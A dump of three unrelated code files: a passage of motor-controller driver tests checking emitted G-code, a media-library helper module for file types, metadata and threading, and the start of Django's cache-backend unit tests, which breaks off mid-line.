'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G28.2C', # HOME C 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', # low current C 'M203.1 A125 B40 C40 X600 Y400 Z125' # reset max-speeds ] assert current_log == expected def send_command_mock(self, command, timeout=12000.0, ack_timeout=5.0): nonlocal current_log current_log.append(command) if 'M119' in command: smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:0 B_max:1 C_max:1' # NOQA smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 0\r\n' # NOQA return smoothie_switch_res robot._driver._send_command = types.MethodType( send_command_mock, robot._driver) current_log = [] robot._driver.unstick_axes('BC') expected = [ 'M203.1 B1 C1', # set max-speeds 'M119', # get switch status 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G28.2BC', # HOME BC 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', # low current BC 'M203.1 A125 B40 C40 X600 Y400 Z125' # reset max-speeds ] assert current_log == expected def test_alarm_unhandled(smoothie, robot, monkeypatch): smoothie.simulating = False robot._driver = smoothie killmsg = 'ALARM: Kill button pressed - reset or M999 to continue\r\n' def fake_write_and_return(cmdstr, ack, conn, timeout=None, tag=None): return cmdstr + killmsg monkeypatch.setattr(serial_communication, 'write_and_return', fake_write_and_return) assert serial_communication.write_and_return is fake_write_and_return robot._driver.move({'X': 0}) robot._driver._is_hard_halting.set() with pytest.raises(driver_3_0.SmoothieAlarm): robot._driver.move({'X': 25}) assert not robot._driver._is_hard_halting.is_set() def test_move_splitting(smoothie, robot, monkeypatch): smoothie.simulating = False command_log = [] time_mock = Mock() monkeypatch.setattr(utils.time, 'monotonic', time_mock) time_mock.return_value = 0 def send_command_logger(command, timeout=12000.0, ack_timeout=5.0): nonlocal command_log command_log.append(command) monkeypatch.setattr(smoothie, '_send_command', send_command_logger) smoothie.update_steps_per_mm({'B': 3200, 'C': 3200}) command_log.clear() time_mock.return_value = 10 smoothie.move({'X': 100}) # no backlash, no move splitting, nice and easy assert command_log\ == ['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4P0.005 G0X100'] command_log.clear() # move splitting but for a different axis - ignored smoothie.configure_splits_for({'B': types.MoveSplit( split_distance=50, split_current=1.5, split_speed=0.5, after_time=0, fullstep=True)}) time_mock.return_value = 20 smoothie.move({'C': 10}) assert command_log\ == ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0C10.3 G0C10', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] command_log.clear() # move splits that are longer than the move get eaten both in - time_mock.return_value = 40 smoothie.configure_splits_for( {'B': types.MoveSplit( split_distance=30, split_current=1.5, split_speed=0.5, after_time=0, fullstep=False)}) smoothie._position['B'] = 100 smoothie.move({'B': 75}) assert command_log\ == ['G0F30 M907 A0.1 B1.5 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'G0B75', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B75', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] command_log.clear() # and in + time_mock.return_value = 50 smoothie.move({'B': 100}) assert command_log\ == ['G0F30 M907 A0.1 B1.5 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'G0B100.3', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 ' 'G0B100.3 G0B100', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] # if backlash 
is involved, it's added on top # prep by moving to 0 time_mock.return_value = 60 smoothie.move({'C': 0}) smoothie.configure_splits_for({'C': types.MoveSplit( split_distance=1, split_current=2.0, split_speed=1, after_time=0, fullstep=True)}) command_log.clear() smoothie.move({'C': 20}) assert command_log\ == ['M55 M92 C100.0 G4P0.01 ' 'G0F60 M907 A0.1 B0.05 C2.0 X0.3 Y0.3 Z0.1 G4P0.005', 'G0C1', 'M54 M92 C3200 G4P0.01', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 ' 'G0C20.3 G0C20', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] # noqa(E501) # if backlash is involved, the backlash target should be the limit # for the split move smoothie.move({'C': 15}) smoothie.configure_splits_for({'C': types.MoveSplit( split_distance=10, split_current=2.0, split_speed=1, after_time=0, fullstep=True)}) command_log.clear() time_mock.return_value = 70 smoothie.move({'C': 20}) # note that the backlash/target move has a 0.05A current on C even though # it is active because that is the robot config default active plunger # current. when the driver is used with the rest of the robot or hardware # control stack it uses the higher currents assert command_log\ == ['M55 M92 C100.0 G4P0.01 ' 'G0F60 M907 A0.1 B0.05 C2.0 X0.3 Y0.3 Z0.1 G4P0.005', 'G0C20.3', 'M54 M92 C3200 G4P0.01', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 ' 'G0C20.3 G0C20', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] # noqa(E501) smoothie.configure_splits_for( {'B': types.MoveSplit( split_distance=50, split_current=1.5, split_speed=0.5, after_time=10, fullstep=True)}) # timing: if the axis has moved recently (since we're changing the # time mock) it shouldn't split. first move to reset the last moved at smoothie.move({'B': 0}) command_log.clear() # this move therefore should not split smoothie.move({'B': 100}) assert command_log[0:1] == [ 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B100.3 G0B100'] command_log.clear() # nor should this move time_mock.return_value = 79 smoothie.move({'B': 1}) assert command_log[0:1] == [ 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B1'] command_log.clear() # now that we advance time, we split time_mock.return_value = 89.01 command_log.clear() smoothie.move({'B': 100}) assert command_log == [ 'M53 M92 B100.0 G4P0.01 G0F30 ' 'M907 A0.1 B1.5 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'G0B51', 'M52 M92 B3200 G4P0.01', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 ' 'G0B100.3 G0B100', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] def test_per_move_speed(smoothie, robot, monkeypatch): smoothie.simulating = False command_log = [] def send_command_logger(command, timeout=12000.0, ack_timeout=5.0): nonlocal command_log command_log.append(command) monkeypatch.setattr(smoothie, '_send_command', send_command_logger) # no speed argument: use combined speed smoothie.move({'X': 100}) assert command_log[0]\ == 'M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4P0.005 G0X100' command_log.clear() # specify speed: both set and reset smoothie.move({'Y': 100}, speed=100) assert command_log[0]\ == 'G0F6000 M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4P0.005 G0Y100 G0F24000' # noqa(E501)
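Nearly every test above follows the same skeleton: patch serial_communication.write_and_return with a logger, patch _parse_position_response so position reads are no-ops, drive the driver, then fuzzy_assert on the captured G-code. A condensed sketch of that pattern (the expected patterns here are illustrative, not taken from the suite):

def test_example_pattern(smoothie, monkeypatch):
    command_log = []
    smoothie._setup()
    smoothie.home()
    smoothie.simulating = False

    def write_with_log(command, ack, connection, timeout, tag=None):
        command_log.append(command.strip())
        return driver_3_0.SMOOTHIE_ACK

    def _parse_position_response(arg):
        return smoothie.position

    monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log)
    monkeypatch.setattr(driver_3_0, '_parse_position_response', _parse_position_response)

    smoothie.move({'X': 10})
    fuzzy_assert(result=command_log, expected=[
        ['M907 .+ G0X10'],  # currents raised, then the move itself
        ['M400'],           # wait for the move to finish
    ])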
misc.py
# Helpers that don't have dependencies on our other modules.
import asyncio, concurrent, os, io, struct, threading, time, traceback, sys, queue
from contextlib import contextmanager
from PIL import Image, ExifTags
from pprint import pprint
from ..util.tiff import get_tiff_metadata
from .video_metadata import mp4, mkv, gif

image_types = {
    '.png': 'image/png',
    '.jpg': 'image/jpeg',
    '.jpeg': 'image/jpeg',
    '.bmp': 'image/bmp',
    '.gif': 'image/gif',
    '.webp': 'image/webp',
    '.tif': 'image/tiff',
    '.tiff': 'image/tiff',
}

video_types = {
    '.webm': 'video/webm',
    '.mp4': 'video/mp4',
    '.m4v': 'video/mp4',
    '.mkv': 'video/x-matroska',
    '.mov': 'video/quicktime',
    '.3gp': 'video/3gpp',
}

def file_type_from_ext(ext):
    if ext.lower() in image_types:
        return 'image'
    if ext.lower() in video_types:
        return 'video'
    return None

def mime_type_from_ext(ext, allow_unknown=False):
    ext = ext.lower()
    if ext in image_types:
        return image_types[ext]
    if ext in video_types:
        return video_types[ext]
    if allow_unknown:
        return 'application/octet-stream'
    else:
        return None

def _get_ext(path):
    # os.path.splitext is very slow for some reason, so we split the extension
    # ourself.
    path = str(path)
    parts = path.rsplit('.', 1)
    if len(parts) < 2:
        # Return a string that won't match any extension, so callers can still
        # call .lower() on the result.
        return 'None'
    return '.' + parts[1].lower()

def file_type(path):
    ext = _get_ext(path)
    return file_type_from_ext(ext)

def mime_type(path):
    ext = _get_ext(path)
    return mime_type_from_ext(ext)

class Error(Exception):
    def __init__(self, code, reason):
        self.code = code
        self.reason = reason

    def data(self):
        return {
            'success': False,
            'code': self.code,
            'reason': self.reason,
        }

exif_tag_ids = { value: key for key, value in ExifTags.TAGS.items() }

def read_metadata(f, mime_type):
    """
    Parse basic metadata from a file.

    This is currently only implemented for JPEGs.
    """
    if mime_type.startswith('video/'):
        if mime_type == 'video/mp4':
            data = mp4.parse(f)
        elif mime_type in ('video/webm', 'video/x-matroska'):
            data = mkv.parse(f)
        else:
            return { }

        return {
            'width': data.get('width'),
            'height': data.get('height'),
            'title': data.get('tag/nam') or '',
            'comment': data.get('tag/cmt') or '',
            'artist': data.get('tag/ART') or '',
            'tags': '',
            'codec': data.get('codec'),
            'duration': data.get('duration'),

            # "animation" means we'll use the ZIP animation format for the file rather
            # than treat it as a video, since browsers don't support MJPEG.
            'animation': data.get('codec') == 'V_MJPEG',
        }

    if not mime_type.startswith('image/'):
        return { }

    # Use our own parser for GIFs, since PIL is slow at this.
    if mime_type == 'image/gif':
        data = gif.parse_gif_metadata(f).data
        return {
            'width': data['width'],
            'height': data['height'],
            'duration': data['duration'],
            'frame_durations': data['frame_durations'],
            'animation': len(data['frame_durations']) > 1,
        }

    # Use our faster implementation to get metadata from TIFFs.
    if mime_type == 'image/tiff':
        return get_tiff_metadata(f)

    result = { }

    try:
        img = Image.open(f)
    except Exception as e:
        # This should be IOError, but the WebP decoder sometimes fails with RuntimeError.
        print('Couldn\'t read metadata from %s: %s' % (f, e))
        return { }

    result['width'] = img.size[0]
    result['height'] = img.size[1]

    # PIL's parser for PNGs is very slow, so only support metadata from JPEG for now.
if mime_type == 'image/jpeg' and hasattr(img, '_getexif'): exif_dict = img._getexif() if exif_dict is None: exif_dict = { } def get_exif_string_tag(name, exif_name): data = exif_dict.get(exif_tag_ids[exif_name]) if not data: return try: data = data.decode('UTF-16LE') except UnicodeDecodeError: return # These are null-terminated. data = data.rstrip('\u0000') result[name] = data get_exif_string_tag('title', 'XPTitle') get_exif_string_tag('comment', 'XPComment') get_exif_string_tag('artist', 'XPAuthor') get_exif_string_tag('tags', 'XPKeywords') # XPAuthor is semicolon separated. Reformat this to comma-separated. if 'artist' in result: result['artist'] = ', '.join(result['artist'].split(';')) # Tags is semicolon-separated. Reformat this to space-separated. if 'tags' in result: result['tags'] = ' '.join(result['tags'].split(';')) # See if this image is rotated by 90 or 270 degrees and swap the dimensions # if needed. exif = img.getexif() ORIENTATION = 0x112 image_orientation = exif.get(ORIENTATION, 0) rotated = image_orientation >= 5 if rotated: result['width'], result['height'] = result['height'], result['width'] return result class AsyncEvent: """ A simple async implementation of threading.Event. """ def __init__(self): self.waits = set() self._is_set = False @property def is_set(self): return self._is_set def set(self): self._is_set = True # Wake up all waiters. for future in self.waits: if not future.done(): future.set_result(True) def clear(self): self._is_set = False async def wait(self, timeout=None): """ Wait up to timeout to be woken up. Return true if we were woken up, false if we timed out. """ if self._is_set: return True future = asyncio.get_running_loop().create_future() self.waits.add(future) try: await asyncio.wait_for(future, timeout) return True except asyncio.TimeoutError: return False finally: self.waits.remove(future) class RunMainTask: """ Run the main async task. asyncio is unreliable with KeyboardInterrupt. However, KeyboardInterrupt shouldn't be used anyway. It's much more reliable to just cancel the main task and never raise KeyboardInterrupt inside it. This runs the main task in a thread, so it doesn't see KeyboardInterrupt, and cancels it on interrupt. main() will be called with a set_main_task keyword argument, which should be called from within the main task that should be cancelled on interrupt. """ def __init__(self, main): self._main = main self._task_finished = threading.Event() self._main_loop = None self._main_task = None self._thread = threading.Thread(target=self._run, name='main') self._thread.start() interrupt_count = 0 last_interrupt_at = 0 while self._thread.is_alive(): try: # XXX: classic Python problem, join() blocks KeyboardInterrupt if self._thread.join(.1): break except KeyboardInterrupt: if time.time() - last_interrupt_at > 5: interrupt_count = 0 interrupt_count += 1 last_interrupt_at = time.time() if interrupt_count >= 3: # The user hit ^C a few times and we haven't exited, so force the issue. print('Exiting') os._exit(0) self._cancel_main_task() def _cancel_main_task(self): if self._main_task is None: print('No main task to cancel') return assert self._main_loop is not None print('Shutting down...') future = asyncio.run_coroutine_threadsafe(self._do_cancel_main_task(), self._main_loop) try: # Wait for _do_cancel_main_task to complete. This doesn't mean the task has finished. future.result(timeout=5) return except concurrent.futures.TimeoutError: # This should never happen. 
            print('Shutdown timed out')

            this_thread_id = threading.current_thread().ident
            frames = sys._current_frames()
            for thread in threading.enumerate():
                thread_id = thread.ident
                if thread_id == this_thread_id:
                    continue
                if not thread.is_alive():
                    continue

                print(f'Thread {thread_id}: {thread.name}')
                thread_frames = frames.get(thread_id)
                if thread_frames:
                    traceback.print_stack(thread_frames, limit=4)
                print('')
            del frames

            if False:
                for task in asyncio.all_tasks(self._main_loop):
                    print(task)
                    print('stack:')
                    task.print_stack()
                    print('')

    async def _do_cancel_main_task(self):
        self._main_task.cancel()

    def _run(self):
        try:
            self._main(set_main_task=self.set_main_task)
        except asyncio.CancelledError:
            # XXX: signal the main thread that we've finished
            return
        finally:
            self._task_finished.set()

    def set_main_task(self):
        self._main_loop = asyncio.get_running_loop()
        self._main_task = asyncio.current_task()

class TransientWriteConnection:
    """
    This is a convenience wrapper for opening and closing database connections.

    We often run searches, which can perform writes to the database, then yield
    to the caller.  When we do that, we might not be resumed for a long time,
    and we need to be sure not to keep a write transaction pending.  However, we
    don't want to open a new transaction for every write.

    TransientWriteConnection is used as a context manager, and opens a connection
    on demand.  The connection remains open when the context manager exits.  To
    close the connection, call commit().  The connection will be committed and
    closed, and will be reopened the next time it's used.
    """
    def __init__(self, db):
        self.db = db
        self.in_use = False
        self.connection = None
        self.connection_ctx = None

    def __enter__(self):
        assert not self.in_use
        self.in_use = True

        if self.connection is None:
            # Open a connection.  Note that db.connect() is a context manager, and we need
            # to keep a reference to it, both so we can call __exit__ when we're done and because
            # if it's GC'd, the context manager will be exited prematurely.
            self.connection_ctx = self.db.connect(write=False)

            try:
                self.connection = self.connection_ctx.__enter__()
            except:
                self.in_use = False
                self.connection_ctx = None
                raise

        return self.connection

    def __exit__(self, type, value, traceback):
        assert self.in_use
        self.in_use = False

        # If the context manager closes without an exception, leave the connection
        # open so it can be reused.
        if type is None:
            return

        ctx = self.connection_ctx
        self.connection = None
        self.connection_ctx = None

        # Pass exceptions to the self.connection context manager, so it'll roll
        # back the transaction and shut down.
        ctx.__exit__(type, value, traceback)

    def commit(self):
        assert not self.in_use
        if self.connection is None:
            return

        ctx = self.connection_ctx
        self.connection_ctx = None
        self.connection = None
        ctx.__exit__(None, None, None)

    def __del__(self):
        if not self.in_use:
            return
        print('Warning: TransientWriteConnection wasn\'t closed')

class WithBuilder:
    """
    Build an SQL WITH statement for a list of rows.

    builder = WithBuilder('id', 'name', table_name='names')
    builder.add_row(1, 'Name1')
    builder.add_row(2, 'Name2')

    params = []
    builder.get_params(params)
    with_statement = builder.get()
    """
    def __init__(self, *fields, table_name):
        self.table_name = table_name
        self.fields = fields
        self.rows = []

    def add_row(self, *row):
        assert len(row) == len(self.fields)
        self.rows.append(row)

    def get_params(self, params):
        for row in self.rows:
            params.extend(row)

    def get(self):
        """
        Return the WITH statement, eg.
            files(id, name) AS (VALUES (?, ?), (?, ?))

        This doesn't include "WITH" itself, since these are normally combined.
        """
        # It seems to be impossible to have a WITH statement with no values, which
        # is a pain.
        if not self.rows:
            # Add a placeholder row of NULLs.  (The values have to be unpacked,
            # since add_row takes one argument per field.)
            self.add_row(*([None] * len(self.fields)))

        # Placeholder for one row, eg. '(?, ?)'
        row_placeholder = ['?'] * len(self.fields)
        row_placeholder = f"({', '.join(row_placeholder)})"

        # Placeholder for all rows, eg. '(?, ?), (?, ?), (?, ?)'
        all_row_placeholders = [row_placeholder] * len(self.rows)
        all_row_placeholders = ', '.join(all_row_placeholders)

        return f"""
            {self.table_name} ({', '.join(self.fields)}) AS (VALUES {all_row_placeholders})
        """

class FixedZipPipe:
    """
    Work around two Python bugs:

    - os.pipe is badly broken on Windows.  They don't throw an exception on
    seek and always return 0 from tell(), which completely breaks ZipFile.
    It's a known bug and nobody seems to care that a core API is broken.  It
    also returns EINVAL instead of EPIPE if the other side is closed, which
    is confusing.

    - If zipfile is given a non-seekable stream, it writes 0 as the file size
    in the local file header.  That's unavoidable if you're streaming data,
    but it makes no sense with writestr(), which receives the whole file at
    once.  It results in unstreamable ZIPs, and we need streamable ZIPs.

    We fix this by calling about_to_write_file with the file size right before
    writing the file, and then replacing the file size in the local file header
    on the next write() call.
    """
    def __init__(self, file):
        self.pos = 0
        self.file = file
        self.next_write_is_local_file_header = None

    def write(self, data):
        if self.next_write_is_local_file_header is not None:
            assert len(data) >= 26
            size = struct.pack('<L', self.next_write_is_local_file_header)
            data = data[0:22] + size + data[26:]

            self.next_write_is_local_file_header = None

        bytes_written = self.file.write(data)
        self.pos += bytes_written

    def tell(self):
        return self.pos

    def close(self):
        self.file.close()

    def __enter__(self):
        return self.file.__enter__()

    def __exit__(self, *args):
        return self.file.__exit__(*args)

    def flush(self):
        self.file.flush()

    def about_to_write_file(self, size):
        self.next_write_is_local_file_header = size

@contextmanager
def WriteZip(zip):
    """
    A fixed context handler for ZipFile.

    ZipFile's __exit__ doesn't check whether it's being called with an exception
    and blindly calls close(), which causes ugly chains of exceptions: a write
    throws an exception, then ZipFile tries to close the file during exception
    handling, which also throws an exception.

    We can't just not call close() on exception, or ZipFile does something else
    it shouldn't: it tries to write to the file in __del__.  That causes random
    writes to files and exceptions during GC later on.  Fix this by clearing its
    file on exception.
    """
    try:
        yield zip
        zip.close()
    except:
        zip.fp = None
        raise

class ThreadedQueue:
    """
    Run an iterator in a thread.

    The results are queued, and can be retrieved with an iterator.  This is used
    to run searches on a thread, and allow them to complete even if they return
    more results than we'll return in one page.
""" def __init__(self, iterator): self.results = queue.Queue() self.iterator = iterator self.cancel = threading.Event() self.thread = threading.Thread(target=self._read_results) self.thread.start() def _read_results(self): try: for result in self.iterator: if self.cancel.is_set(): break if result is None: continue self.results.put(result) finally: self.results.put(None) def __iter__(self): return self def __next__(self): # If the queue has been discarded, we've already stopped. if self.results is None: raise StopIteration result = self.results.get() if result is None: self._join_thread() raise StopIteration return result def cancel(self): """ Cancel the task, and block is true until the generator has stopped. The iterator will receive GeneratorExit the next time it yields a value. """ self.cancel.set() self._join_thread() def _join_thread(self): self.thread.join() self.results = None import unicodedata def split_keywords(s): """ Split s into search keywords. A split like re.findall(r'\w+') has some problems: it includes underscores, which shouldn't be part of keywords, and it batches numbers with letters, which isn't wanted. For some reason it's hard to get regex to do this (why can't you say [\w^\d] to say "\w minus \d"?), so do it ourself. """ result = [] current_word = '' current_category = None for c in s: category = unicodedata.category(c)[0] # If the category changes, flush the current word. if category != current_category: current_category = category if current_word: result.append(current_word) current_word = '' # Only add letters and numbers. if category not in ('L', 'N'): continue current_word += c if current_word: result.append(current_word) return result
tests.py
# -*- coding: utf-8 -*- # Unit tests for cache framework # Uses whatever cache backend is set in the test settings file. from __future__ import unicode_literals import os import re import shutil import tempfile import threading import time import unittest import warnings from django.conf import settings from django.core import management from django.core.cache import cache, caches, CacheKeyWarning, InvalidCacheBackendError from django.db import connection, router, transaction from django.core.cache.utils import make_template_fragment_key from django.http import HttpResponse, StreamingHttpResponse from django.middleware.cache import (FetchFromCacheMiddleware, UpdateCacheMiddleware, CacheMiddleware) from django.template import Template from django.template.response import TemplateResponse from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings from django.test.utils import (IgnoreDeprecationWarningsMixin, IgnorePendingDeprecationWarningsMixin) from django.utils import six from django.utils import timezone from django.utils import translation from django.utils.cache import (patch_vary_headers, get_cache_key, learn_cache_key, patch_cache_control, patch_response_headers) from django.utils.encoding import force_text from django.views.decorators.cache import cache_page try: # Use the same idiom as in cache backends from django.utils.six.moves import cPickle as pickle except ImportError: import pickle from .models import Poll, expensive_calculation # functions/classes for complex data type tests def f(): return 42 class C: def m(n): return 24 class Unpickable(object): def __getstate__(self): raise pickle.PickleError() @override_settings(CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.dummy.DummyCache', } }) class DummyCacheTests(TestCase): # The Dummy cache backend doesn't really behave like a test backend, # so it has its own test case. 
def test_simple(self): "Dummy cache backend ignores cache set calls" cache.set("key", "value") self.assertEqual(cache.get("key"), None) def test_add(self): "Add doesn't do anything in dummy cache backend" cache.add("addkey1", "value") result = cache.add("addkey1", "newvalue") self.assertEqual(result, True) self.assertEqual(cache.get("addkey1"), None) def test_non_existent(self): "Non-existent keys aren't found in the dummy cache backend" self.assertEqual(cache.get("does_not_exist"), None) self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!") def test_get_many(self): "get_many returns nothing for the dummy cache backend" cache.set('a', 'a') cache.set('b', 'b') cache.set('c', 'c') cache.set('d', 'd') self.assertEqual(cache.get_many(['a', 'c', 'd']), {}) self.assertEqual(cache.get_many(['a', 'b', 'e']), {}) def test_delete(self): "Cache deletion is transparently ignored on the dummy cache backend" cache.set("key1", "spam") cache.set("key2", "eggs") self.assertEqual(cache.get("key1"), None) cache.delete("key1") self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), None) def test_has_key(self): "The has_key method doesn't ever return True for the dummy cache backend" cache.set("hello1", "goodbye1") self.assertEqual(cache.has_key("hello1"), False) self.assertEqual(cache.has_key("goodbye1"), False) def test_in(self): "The in operator doesn't ever return True for the dummy cache backend" cache.set("hello2", "goodbye2") self.assertEqual("hello2" in cache, False) self.assertEqual("goodbye2" in cache, False) def test_incr(self): "Dummy cache values can't be incremented" cache.set('answer', 42) self.assertRaises(ValueError, cache.incr, 'answer') self.assertRaises(ValueError, cache.incr, 'does_not_exist') def test_decr(self): "Dummy cache values can't be decremented" cache.set('answer', 42) self.assertRaises(ValueError, cache.decr, 'answer') self.assertRaises(ValueError, cache.decr, 'does_not_exist') def test_data_types(self): "All data types are ignored equally by the dummy cache" stuff = { 'string': 'this is a string', 'int': 42, 'list': [1, 2, 3, 4], 'tuple': (1, 2, 3, 4), 'dict': {'A': 1, 'B': 2}, 'function': f, 'class': C, } cache.set("stuff", stuff) self.assertEqual(cache.get("stuff"), None) def test_expiration(self): "Expiration has no effect on the dummy cache" cache.set('expire1', 'very quickly', 1) cache.set('expire2', 'very quickly', 1) cache.set('expire3', 'very quickly', 1) time.sleep(2) self.assertEqual(cache.get("expire1"), None) cache.add("expire2", "newvalue") self.assertEqual(cache.get("expire2"), None) self.assertEqual(cache.has_key("expire3"), False) def test_unicode(self): "Unicode values are ignored by the dummy cache" stuff = { 'ascii': 'ascii_value', 'unicode_ascii': 'Iñtërnâtiônàlizætiøn1', 'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2', 'ascii2': {'x': 1} } for (key, value) in stuff.items(): cache.set(key, value) self.assertEqual(cache.get(key), None) def test_set_many(self): "set_many does nothing for the dummy cache backend" cache.set_many({'a': 1, 'b': 2}) cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1') def test_delete_many(self): "delete_many does nothing for the dummy cache backend" cache.delete_many(['a', 'b']) def test_clear(self): "clear does nothing for the dummy cache backend" cache.clear() def test_incr_version(self): "Dummy cache versions can't be incremented" cache.set('answer', 42) self.assertRaises(ValueError, cache.incr_version, 'answer') self.assertRaises(ValueError, cache.incr_version, 'does_not_exist') def 
test_decr_version(self): "Dummy cache versions can't be decremented" cache.set('answer', 42) self.assertRaises(ValueError, cache.decr_version, 'answer') self.assertRaises(ValueError, cache.decr_version, 'does_not_exist') def custom_key_func(key, key_prefix, version): "A customized cache key function" return 'CUSTOM-' + '-'.join([key_prefix, str(version), key]) _caches_setting_base = { 'default': {}, 'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())}, 'v2': {'VERSION': 2}, 'custom_key': {'KEY_FUNCTION': custom_key_func}, 'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'}, 'cull': {'OPTIONS': {'MAX_ENTRIES': 30}}, 'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}}, } def caches_setting_for_tests(base=None, **params): # `base` is used to pull in the memcached config from the original settings, # `params` are test specific overrides and `_caches_settings_base` is the # base config for the tests. # This results in the following search order: # params -> _caches_setting_base -> base base = base or {} setting = dict((k, base.copy()) for k in _caches_setting_base.keys()) for key, cache_params in setting.items(): cache_params.update(_caches_setting_base[key]) cache_params.update(params) return setting class BaseCacheTests(object): # A common set of tests to apply to all cache backends def setUp(self): self.factory = RequestFactory() def tearDown(self): cache.clear() def test_simple(self): # Simple cache set/get works cache.set("key", "value") self.assertEqual(cache.get("key"), "value") def test_add(self): # A key can be added to a cache cache.add("addkey1", "value") result = cache.add("addkey1", "newvalue") self.assertEqual(result, False) self.assertEqual(cache.get("addkey1"), "value") def test_prefix(self): # Test for same cache key conflicts between shared backend cache.set('somekey', 'value') # should not be set in the prefixed cache self.assertFalse(caches['prefix'].has_key('somekey')) caches['prefix'].set('somekey', 'value2') self.assertEqual(cache.get('somekey'), 'value') self.assertEqual(caches['prefix'].get('somekey'), 'value2') def test_non_existent(self): # Non-existent cache keys return as None/default # get with non-existent keys self.assertEqual(cache.get("does_not_exist"), None) self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!") def test_get_many(self): # Multiple cache keys can be returned using get_many cache.set('a', 'a') cache.set('b', 'b') cache.set('c', 'c') cache.set('d', 'd') self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'}) self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'}) def test_delete(self): # Cache keys can be deleted cache.set("key1", "spam") cache.set("key2", "eggs") self.assertEqual(cache.get("key1"), "spam") cache.delete("key1") self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), "eggs") def test_has_key(self): # The cache can be inspected for cache keys cache.set("hello1", "goodbye1") self.assertEqual(cache.has_key("hello1"), True) self.assertEqual(cache.has_key("goodbye1"), False) def test_in(self): # The in operator can be used to inspect cache contents cache.set("hello2", "goodbye2") self.assertEqual("hello2" in cache, True) self.assertEqual("goodbye2" in cache, False) def test_incr(self): # Cache values can be incremented cache.set('answer', 41) self.assertEqual(cache.incr('answer'), 42) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.incr('answer', 10), 52) self.assertEqual(cache.get('answer'), 52) 
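# incr() also accepts a negative delta: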
self.assertEqual(cache.incr('answer', -10), 42) self.assertRaises(ValueError, cache.incr, 'does_not_exist') def test_decr(self): # Cache values can be decremented cache.set('answer', 43) self.assertEqual(cache.decr('answer'), 42) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.decr('answer', 10), 32) self.assertEqual(cache.get('answer'), 32) self.assertEqual(cache.decr('answer', -10), 42) self.assertRaises(ValueError, cache.decr, 'does_not_exist') def test_close(self): self.assertTrue(hasattr(cache, 'close')) cache.close() def test_data_types(self): # Many different data types can be cached stuff = { 'string': 'this is a string', 'int': 42, 'list': [1, 2, 3, 4], 'tuple': (1, 2, 3, 4), 'dict': {'A': 1, 'B': 2}, 'function': f, 'class': C, } cache.set("stuff", stuff) self.assertEqual(cache.get("stuff"), stuff) def test_cache_read_for_model_instance(self): # Don't want fields with callable as default to be called on cache read expensive_calculation.num_runs = 0 Poll.objects.all().delete() my_poll = Poll.objects.create(question="Well?") self.assertEqual(Poll.objects.count(), 1) pub_date = my_poll.pub_date cache.set('question', my_poll) cached_poll = cache.get('question') self.assertEqual(cached_poll.pub_date, pub_date) # We only want the default expensive calculation run once self.assertEqual(expensive_calculation.num_runs, 1) def test_cache_write_for_model_instance_with_deferred(self): # Don't want fields with callable as default to be called on cache write expensive_calculation.num_runs = 0 Poll.objects.all().delete() Poll.objects.create(question="What?") self.assertEqual(expensive_calculation.num_runs, 1) defer_qs = Poll.objects.all().defer('question') self.assertEqual(defer_qs.count(), 1) self.assertEqual(expensive_calculation.num_runs, 1) cache.set('deferred_queryset', defer_qs) # cache set should not re-evaluate default functions self.assertEqual(expensive_calculation.num_runs, 1) def test_cache_read_for_model_instance_with_deferred(self): # Don't want fields with callable as default to be called on cache read expensive_calculation.num_runs = 0 Poll.objects.all().delete() Poll.objects.create(question="What?") self.assertEqual(expensive_calculation.num_runs, 1) defer_qs = 